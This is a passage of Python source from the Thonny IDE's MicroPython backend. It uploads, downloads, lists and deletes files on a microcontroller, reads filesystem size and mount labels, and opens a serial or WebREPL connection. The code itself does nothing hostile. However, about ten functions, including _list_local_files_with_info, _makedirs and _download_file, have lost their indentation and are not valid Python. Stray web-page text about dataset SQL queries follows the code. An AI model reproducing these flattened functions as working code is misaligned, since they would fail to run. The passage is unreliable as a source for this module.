                # hex transfer is binary-safe
                script = "__W(%r)" % binascii.hexlify(block)
            else:
                script = "__W(%r)" % block
            self._execute_without_output(script)
            bytes_sent += len(block)

            if notifier is not None:
                notifier(bytes_sent)

        # verify against the device's own count
        bytes_received = self._evaluate("__thonny_written")

        if bytes_received != bytes_sent:
            raise UserError(
                "Expected %d written bytes but wrote %d" % (bytes_sent, bytes_received)
            )

    finally:
        # clean up
        self._execute(
            dedent(
                """
                try:
                    del __W
                    del __thonny_written
                    del __thonny_path
                    __thonny_fp.close()
                    del __thonny_fp
                    del __thonny_unhex
                except:
                    pass
                """
            )
        )

    return bytes_sent
def _sync_all_filesystems(self):
    """Flush the device's filesystem buffers (no-op where os.sync is unavailable)."""
    self._execute_without_output(
        dedent(
            """
            try:
                from os import sync as __thonny_sync
                __thonny_sync()
                del __thonny_sync
            except ImportError:
                pass
            """
        )
    )
def _list_local_files_with_info(self, paths):
def rec_list_with_size(path):
result = {}
if os.path.isfile(path):
result[path] = os.path.getsize(path)
elif os.path.isdir(path):
for name in os.listdir(path):
result.update(rec_list_with_size(os.path.join(path, name)))
else:
raise RuntimeError("Can't process " + path)
return result
result = []
for requested_path in paths:
sizes = rec_list_with_size(requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
return result
def _list_remote_files_with_info(self, paths):
    """Recursively collect {path, size, original_context} records for remote *paths*.

    Defines portable helper functions on the device (stat-based, with a
    micro:bit fallback to os.size), walks each requested path, sorts the
    records by path, then deletes the helpers.
    """
    # prepare universal functions
    self._execute_without_output(
        dedent(
            """
            try:
                import os as __thonny_os
                from os import stat as __thonny_stat

                def __thonny_getsize(path):
                    return __thonny_stat(path)[6]

                def __thonny_isdir(path):
                    return __thonny_stat(path)[0] & 0o170000 == 0o040000

            except ImportError:
                __thonny_stat = None
                # micro:bit
                from os import size as __thonny_getsize

                def __thonny_isdir(path):
                    return False
            """
        )
    )

    self._execute_without_output(
        dedent(
            """
            def __thonny_rec_list_with_size(path):
                result = {}
                if __thonny_isdir(path):
                    for name in __thonny_os.listdir(path):
                        result.update(__thonny_rec_list_with_size(path + "/" + name))
                else:
                    result[path] = __thonny_getsize(path)

                return result
            """
        )
    )

    result = []
    for requested_path in paths:
        sizes = self._evaluate("__thonny_rec_list_with_size(%r)" % requested_path)

        for path in sizes:
            result.append(
                {
                    "path": path,
                    "size": sizes[path],
                    "original_context": os.path.dirname(requested_path),
                }
            )

    result.sort(key=lambda rec: rec["path"])

    self._execute_without_output(
        dedent(
            """
            del __thonny_os
            del __thonny_stat
            del __thonny_getsize
            del __thonny_isdir
            del __thonny_rec_list_with_size
            """
        )
    )
    return result
def _get_existing_remote_files(self, paths):
    """Return the subset of remote *paths* which already exist on the device."""
    if self._supports_directories():
        func = "stat"
    else:
        # micro:bit's os has size() but no stat()
        func = "size"

    return self._evaluate(
        "__thonny_result",
        prelude=dedent(
            """
            import os as __thonny_os
            __thonny_result = []
            for __thonny_path in %r:
                try:
                    __thonny_os.%s(__thonny_path)
                    __thonny_result.append(__thonny_path)
                except OSError:
                    pass
            """
        )
        % (paths, func),
        cleanup=dedent(
            """
            del __thonny_os
            del __thonny_result
            del __thonny_path
            """
        ),
    )
def _join_remote_path_parts(self, left, right):
if left == "": # micro:bit
assert not self._supports_directories()
return right.strip("/")
return left.rstrip("/") + "/" + right.strip("/")
def _get_file_size(self, path):
if self._supports_directories():
script = "__thonny_os.stat(%r)[6]"
else:
script = "os.stat(%r)[6]"
return self._evaluate(script % path, prelude="import os as __thonny_os")
def _makedirs(self, path):
if path == "/":
return
try:
self._makedirs_via_serial(path)
except Exception as e:
if "read-only" in str(e).lower():
self._makedirs_via_mount(path)
def _makedirs_via_mount(self, path):
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None, "Couldn't find mounted path for " + path
os.makedirs(mounted_path, exist_ok=True)
def _makedirs_via_serial(self, path):
    """Create *path* (with parents) on the device, mkdir-ing each missing level."""
    if path == "/":
        return
    path = path.rstrip("/")

    script = (
        dedent(
            """
            import os as __thonny_os
            __thonny_parts = %r.split('/')
            for i in range(2, len(__thonny_parts) + 1):
                __thonny_path = "/".join(__thonny_parts[:i])
                try:
                    __thonny_os.stat(__thonny_path)
                except OSError:
                    # does not exist
                    __thonny_os.mkdir(__thonny_path)

            del __thonny_parts
            try:
                del __thonny_path
            except:
                pass
            """
        )
        % path
    )

    self._execute_without_output(script)
def _delete_via_mount(self, paths):
for path in paths:
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None
shutil.rmtree(mounted_path)
def _delete_via_serial(self, paths):
    """Delete remote *paths* over the REPL (recursive rm on devices with directories)."""
    if not self._supports_directories():
        # flat filesystem (micro:bit): plain remove is enough
        self._execute_without_output(
            dedent(
                """
                import os as __thonny_os
                for __thonny_path in %r:
                    __thonny_os.remove(__thonny_path)

                del __thonny_path
                del __thonny_os
                """
            )
            % paths
        )
    else:
        self._execute_without_output(
            dedent(
                """
                import os as __thonny_os
                def __thonny_delete(path):
                    if __thonny_os.stat(path)[0] & 0o170000 == 0o040000:
                        for name in __thonny_os.listdir(path):
                            child_path = path + "/" + name
                            __thonny_delete(child_path)
                        __thonny_os.rmdir(path)
                    else:
                        __thonny_os.remove(path)

                for __thonny_path in %r:
                    __thonny_delete(__thonny_path)

                del __thonny_path
                del __thonny_delete
                del __thonny_os
                """
            )
            % paths
        )
def _upload_file(self, source, target, notifier):
    """Upload local file *source* to remote *target*, creating parent dirs first.

    Returns the number of bytes written (via _write_file).
    """
    assert target.startswith("/") or not self._supports_directories()
    target_dir, _ = linux_dirname_basename(target)
    assert target_dir.startswith("/") or not self._supports_directories()

    self._makedirs(target_dir)

    def block_generator():
        # stream the file in 512-byte blocks to avoid loading it whole
        with open(source, "rb") as source_fp:
            while True:
                block = source_fp.read(512)
                if block:
                    yield block
                else:
                    break

    return self._write_file(block_generator(), target, notifier=notifier)
def _download_file(self, source, target, notifier=None):
os.makedirs(os.path.dirname(target), exist_ok=True)
bytes_written = 0
with open(target, "wb") as out_fp:
for block in self._read_file(source):
out_fp.write(block)
os.fsync(out_fp)
bytes_written += len(block)
notifier(bytes_written)
return bytes_written
def _get_fs_mount_label(self):
    """Return the volume label of the device's flash (eg. CIRCUITPY), or None.

    Only CircuitPython's storage.getmount is queried; other firmwares
    don't expose a label here.
    """
    # This method is most likely required with CircuitPython,
    # so try its approach first
    # https://learn.adafruit.com/welcome-to-circuitpython/the-circuitpy-drive
    result = self._evaluate(
        "__thonny_result",
        prelude=dedent(
            """
            try:
                from storage import getmount as __thonny_getmount
                try:
                    __thonny_result = __thonny_getmount("/").label
                finally:
                    del __thonny_getmount
            except ImportError:
                __thonny_result = None
            except OSError:
                __thonny_result = None
            """
        ),
        cleanup="del __thonny_result",
    )

    if result is not None:
        return result

    if self._welcome_text is None:
        return None

    """
    # following is not reliable and probably not needed
    markers_by_name = {"PYBFLASH": {"pyb"}, "CIRCUITPY": {"circuitpython"}}
    for name in markers_by_name:
        for marker in markers_by_name[name]:
            if marker.lower() in self._welcome_text.lower():
                return name
    """
    return None
def _get_flash_prefix(self):
if not self._supports_directories():
return ""
elif (
"LoBo" in self._welcome_text
or "WiPy with ESP32" in self._welcome_text
or "PYBLITE" in self._welcome_text
or "PYBv" in self._welcome_text
or "PYBOARD" in self._welcome_text.upper()
):
return "/flash/"
else:
return "/"
def _get_fs_mount(self):
    """Locate the local mount point of the device's flash volume.

    Returns None when the label can't be determined; raises RuntimeError
    when the labelled volume is missing or ambiguous.
    """
    label = self._get_fs_mount_label()
    if label is None:
        return None
    else:
        candidates = find_volumes_by_name(
            self._get_fs_mount_label(),
            # querying A can be very slow
            skip_letters="A",
        )
        if len(candidates) == 0:
            raise RuntimeError("Could not find volume " + self._get_fs_mount_label())
        elif len(candidates) > 1:
            raise RuntimeError("Found several possible mount points: %s" % candidates)
        else:
            return candidates[0]
def _get_fs_info(self, path):
    """Return a dict describing filesystem usage at *path* on the device.

    On devices providing ``os.statvfs`` the dict has integer "total",
    "used" and "free" byte counts. On devices without statvfs (e.g.
    micro:bit) those are None and a human-readable "comment" entry
    summarizing per-file sizes is added instead.

    :param path: device-side path passed to statvfs
    """
    result = self._evaluate(
        dedent(
            """{
                "total" : __thonny_total,
                "used" : __thonny_used,
                "free": __thonny_free,
                "sizes": __thonny_sizes
            }"""
        ),
        prelude=dedent(
            """
            try:
                from os import statvfs as __thonny_statvfs
                __thonny_stat = __thonny_statvfs(%r)
                __thonny_total = __thonny_stat[2] * __thonny_stat[0]
                __thonny_free = __thonny_stat[3] * __thonny_stat[0]
                __thonny_used = __thonny_total - __thonny_free
                __thonny_sizes = None
                del __thonny_statvfs
                del __thonny_stat
            except ImportError:
                import os as __thonny_os
                __thonny_sizes = [__thonny_os.size(name) for name in __thonny_os.listdir()]
                __thonny_used = None
                __thonny_total = None
                __thonny_free = None
                del __thonny_os
            """
        )
        % path,
        cleanup=dedent(
            """
            del __thonny_total
            del __thonny_free
            del __thonny_used
            del __thonny_sizes
            """
        ),
    )

    if result["sizes"] is not None:
        # statvfs was unavailable -- only individual file sizes are known
        if self._connected_to_microbit():
            comment = "Assuming around 30 kB of storage space for user files."
        else:
            comment = "Don't know the size of storage space on this device."

        files_total_size = sum(result["sizes"])

        # TODO: compute number of used blocks
        if files_total_size > 0:
            comment += "\n\n" + "At least %s of it is used by %d file(s)." % (
                sizeof_fmt(files_total_size),
                len(result["sizes"]),
            )

        result["comment"] = comment
        del result["sizes"]

    return result
def _get_microbit_file_sizes(self):
return self._evaluate(
"{name : __thonny_os.size(name) for name in __thonny_os.listdir()}",
prelude="import os as __thonny_os",
cleanup="del __thonny_os",
)
def _get_dirs_child_data_generic(self, paths):
    """For each path in *paths*, list its children with kind, size and time.

    :param paths: iterable of device-side directory paths ("" means root)
    :return: ``{path: children}`` where *children* is
        ``{name: {"kind": "dir"|"file", "size": int|None, "time": int}}``,
        or None when the directory could not be listed (e.g. it was
        deleted in the meantime). Dot-files and Windows'
        "System Volume Information" are skipped.
    """
    return self._evaluate(
        "__thonny_result",
        prelude=dedent(
            """
            import os as __thonny_os
            # Init all vars, so that they can be deleted
            # even if the loop makes no iterations
            __thonny_result = {}
            __thonny_path = None
            __thonny_st = None
            __thonny_child_names = None
            __thonny_children = None
            __thonny_name = None
            __thonny_real_path = None
            __thonny_full = None

            for __thonny_path in %(paths)r:
                __thonny_real_path = __thonny_path or '/'
                try:
                    __thonny_child_names = __thonny_os.listdir(__thonny_real_path)
                except OSError:
                    # probably deleted directory
                    __thonny_children = None
                else:
                    __thonny_children = {}
                    for __thonny_name in __thonny_child_names:
                        if __thonny_name.startswith('.') or __thonny_name == "System Volume Information":
                            continue
                        __thonny_full = (__thonny_real_path + '/' + __thonny_name).replace("//", "/")
                        __thonny_st = __thonny_os.stat(__thonny_full)
                        if __thonny_st[0] & 0o170000 == 0o040000:
                            # directory
                            __thonny_children[__thonny_name] = {"kind" : "dir", "size" : None}
                        else:
                            __thonny_children[__thonny_name] = {"kind" : "file", "size" :__thonny_st[6]}
                        __thonny_children[__thonny_name]["time"] = max(__thonny_st[8], __thonny_st[9])

                __thonny_result[__thonny_path] = __thonny_children
            """
        )
        % {"paths": paths},
        cleanup=dedent(
            """
            del __thonny_os
            del __thonny_st
            del __thonny_children
            del __thonny_name
            del __thonny_path
            del __thonny_full
            del __thonny_result
            del __thonny_real_path
            """
        ),
    )
def _check_for_connection_errors(self):
self._connection._check_for_error()
def _on_connection_closed(self):
    """Inform the user the device connection died and exit the backend.

    Exits with EXPECTED_TERMINATION_CODE so the front-end treats this
    as an anticipated shutdown rather than a crash.
    """
    message = "\n" + "Connection closed. Use 'Run → Stop / Restart' to reconnect." + "\n"
    self._send_output(message, "stderr")
    sys.exit(EXPECTED_TERMINATION_CODE)
class ExecutionError(Exception):
    """Signals a failure while executing commands on the device.

    NOTE(review): raised/caught elsewhere in this file -- confirm exact
    contract at the usage sites.
    """
    pass
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def parse_api_information(file_path):
    """Extract a class/member overview from a Python (stub) file.

    :param file_path: path to a Python source file
    :return: dict mapping each top-level class name to the list of
        names of its directly contained function definitions
    """
    # tokenize.open honors PEP 263 encoding declarations
    with tokenize.open(file_path) as fp:
        source = fp.read()

    tree = ast.parse(source)

    defs = {}
    # TODO: read also docstrings ?
    for toplevel_item in tree.body:
        if isinstance(toplevel_item, ast.ClassDef):
            # TODO: also collect assigned attribute names
            # (ast.Assign -> item.targets[0].id); previously this was a
            # dead no-op string statement.
            defs[toplevel_item.name] = [
                item.name
                for item in toplevel_item.body
                if isinstance(item, ast.FunctionDef)
            ]

    return defs
def linux_dirname_basename(path):
    """Split a POSIX-style path into (directory, basename).

    Unlike os.path this never consults the host OS conventions; it is
    meant for device-side ("linux-like") paths.

    :return: tuple (dir, base); root is ("/", ""), a bare name gets
        dir "" (flat micro:bit filesystem)
    """
    if path == "/":
        return ("/", "")

    if "/" not in path:  # micro:bit
        return "", path

    path = path.rstrip("/")
    if "/" not in path:
        # e.g. "foo/" -- relative name with trailing slash; previously
        # this crashed in the two-way unpack below
        return "", path

    dir_, file_ = path.rsplit("/", maxsplit=1)
    if dir_ == "":
        dir_ = "/"

    return dir_, file_
def to_remote_path(path):
    """Normalize a local (possibly Windows) path to forward slashes."""
    return "/".join(path.split("\\"))
class ReadOnlyFilesystemError(RuntimeError):
    """Raised when a write is attempted on a read-only device filesystem."""
    pass
if __name__ == "__main__":
    import argparse

    parser = argparse.ArgumentParser()
    # argparse delivers raw strings; map exactly "True" to boolean True
    parser.add_argument("--clean", type=lambda s: True if s == "True" else False)
    parser.add_argument("--port", type=str)
    parser.add_argument("--url", type=str)
    parser.add_argument("--password", type=str)
    parser.add_argument("--api_stubs_path", type=str)
    args = parser.parse_args()

    # the launcher passes the literal string "None" to mean "no port yet"
    port = None if args.port == "None" else args.port
    try:
        if port is None:
            # remain busy
            while True:
                time.sleep(1000)
        elif port == "webrepl":
            # network connection via MicroPython's WebREPL
            from thonny.plugins.micropython.webrepl_connection import WebReplConnection

            connection = WebReplConnection(args.url, args.password)
        else:
            # direct serial connection
            from thonny.plugins.micropython.serial_connection import SerialConnection

            connection = SerialConnection(port, BAUDRATE)

        # NOTE(review): constructing the backend apparently starts the
        # session/mainloop as a side effect -- confirm; `vm` is unused.
        vm = MicroPythonBackend(connection, clean=args.clean, api_stubs_path=args.api_stubs_path)

    except ConnectionFailedException as e:
        # report the failure to the front-end as a serialized event on stdout
        text = "\n" + str(e) + "\n"
        msg = BackendEvent(event_type="ProgramOutput", stream_name="stderr", data=text)
        sys.stdout.write(serialize_message(msg) + "\n")
        sys.stdout.flush()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.